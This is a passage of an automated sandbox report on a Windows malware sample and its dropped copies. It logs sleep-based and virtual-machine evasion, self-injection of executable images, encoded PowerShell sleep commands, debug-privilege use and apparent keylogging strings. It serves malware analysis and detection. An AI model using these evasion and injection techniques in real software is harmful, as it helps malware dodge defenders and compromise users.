               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1198451s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1198312s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1198185s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1198062s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1197936s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1197810s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1197656s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1197492s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1197250s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1196906s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1196703s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1196562s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1196405s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1196247s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1196109s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1195997s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1195874s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1195765s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1195655s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1195545s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1195406s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1195280s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1195171s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1195046s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1194937s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1194824s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1194703s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1194593s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1194484s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1194374s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1194265s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1194156s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1194046s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1193934s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1193811s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1193656s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1193544s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1193420s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1193285s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1193150s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1193006s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1192887s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1192772s >= -30000s
               Source: C:\Users\user\Desktop\izwFjkhFJm.exe    TID: 5124    Thread sleep time: -1192647s >= -30000s
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 3312    Thread sleep time: -9223372036854770s >= -30000s
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 3312    Thread sleep count: 34 > 30
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 3160    Thread sleep count: 9536 > 30
               Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe    TID: 5176    Thread sleep time: -922337203685477s >= -30000s
               Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe    TID: 5176    Thread sleep count: 41 > 30
               Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe    TID: 3924    Thread sleep count: 9623 > 30
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 5040    Thread sleep time: -922337203685477s >= -30000s
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 5040    Thread sleep count: 44 > 30
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 4556    Thread sleep count: 9596 > 30
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    TID: 2436    Thread sleep time: -11990383647911201s >= -30000s
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    TID: 5172    Thread sleep time: -922337203685477s >= -30000s
               Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe    TID: 4980    Thread sleep time: -1844674407370954s >= -30000s
               Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe    TID: 4980    Thread sleep count: 39 > 30
               Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe    TID: 4936    Thread sleep count: 9642 > 30
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    TID: 4424    Thread sleep time: -11068046444225724s >= -30000s
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 1812    Thread sleep count: 639 > 30
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 4532    Thread sleep time: -922337203685477s >= -30000s
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 4532    Thread sleep time: -1200000s >= -30000s
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 4532    Thread sleep time: -1198890s >= -30000s
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 4532    Thread sleep time: -1198750s >= -30000s
               Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe    TID: 4532    Thread sleep time: -1198343s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1198203s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197874s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197561s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197296s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197077s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196949s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196750s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196593s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196390s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1195843s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1195587s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1195093s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3068Thread sleep count: 2115 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1200000Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199812Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199514Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199359Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199233Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199106Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198966Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198812Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198685Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198451Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198312Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198185Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198062Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197936Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197810Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197656Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197492Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197250Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196906Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196703Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196562Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196405Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196247Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196109Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195997Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195874Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195765Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195655Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195545Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195406Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195280Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195171Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195046Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194937Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194824Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194703Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194593Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194484Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194374Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194265Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194156Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194046Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193934Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193811Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193656Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193544Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193420Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193285Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193150Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193006Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192887Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192772Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192647Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1200000
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198890
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198343
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198203
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197874
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197561
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197296
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197077
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196949
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196593
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196390
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195843
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195587
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195093
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Window / User API: threadDelayed 9668
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9400
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Window / User API: threadDelayed 9210
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Window / User API: threadDelayed 9536
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Window / User API: threadDelayed 9623
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Window / User API: threadDelayed 9596
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7267
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Window / User API: threadDelayed 9642
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9081
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Window / User API: threadDelayed 639
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2115
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process information queried: ProcessInformation
Source: Oefdyik.exe, 0000001B.00000002.519934856.00000000011B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll096
Source: kDPmkTm.exe, 00000011.00000002.520665643.000000000126D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: izwFjkhFJm.exe, 0000000F.00000003.344564244.0000000001519000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Memory written: C:\Users\user\Desktop\izwFjkhFJm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Memory written: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp, izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r{Win}
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r{Win}r
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Users\user\Desktop\izwFjkhFJm.exe VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
